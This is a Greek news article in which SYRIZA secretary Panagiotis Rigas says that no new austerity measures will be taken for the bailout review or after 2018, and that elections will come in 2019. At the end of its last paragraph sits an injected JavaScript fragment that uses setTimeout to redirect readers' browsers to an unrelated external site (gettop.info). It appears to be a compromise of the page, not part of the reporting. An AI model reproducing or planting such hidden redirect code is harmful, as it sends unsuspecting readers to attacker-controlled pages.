Ρήγας: Δεν θα ληφθούν μέτρα ούτε για μετά το 2018

0
6

 

Στην Ευρώπη προφανώς δεν θέλουν μια κυβέρνηση που ακολουθεί κοινωνική πολιτική και αντιστέκεται σημείωσε μιλώντας στον ΣΚΑΪ ο γραμματέας του ΣΥΡΙΖΑ, Παναγιώτης Ρήγας, ο οποίος μεταξύ άλλων επεσήμανε: «Αν συνεχιστεί η σκληρή στάση για μέτρα σημαίνει ότι υπάρχει υπονόμευση της κυβέρνησης εκ μέρους των δανειστών».

Επίσης, υπογράμμισε ότι δεν θα ληφθούν νέα μέτρα, παρά τις πιέσεις, για τη δεύτερη αξιολόγηση και εκτίμησε πως θα κλείσει εντός του Ιανουαρίου. Τόνισε πως δεν θα ληφθούν μέτρα ούτε για μετά το 2018 καθώς τότε τελειώνει το πρόγραμμα.

Αναγνώρισε ότι υπάρχει πρόβλημα με τα πλεονάσματα τού 3,5% αλλά εξέφρασε την άποψη ότι δεν μπορεί να συνδεθεί με αυτή την αξιολόγηση.

Απαντώντας σε σχετική ερώτηση είπε ότι παρά τις πιέσεις η κυβέρνηση θα αντέξει και οι εκλογές θα γίνουν το 2019. Υπεραμύνθηκε των αλλαγών στο ασφαλιστικό και της επιβολής εισφορών σε ελεύθερους επαγγελματίες και αγρότες με βάση το εισόδημα, σημειώνοντας ότι για την πλειονότητα θα μειωθούν οι εισφορές.

Τόνισε ότι ο κόσμος στηρίζει την προσπάθεια που κάνει η κυβέρνηση παρά το γεγονός ότι υπάρχουν δυσκολίες καθώς δεν θέλουν να επανέλθει το παλιό σύστημα του παρασιτικού καπιταλισμού που υπήρχε στην Ελλάδα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here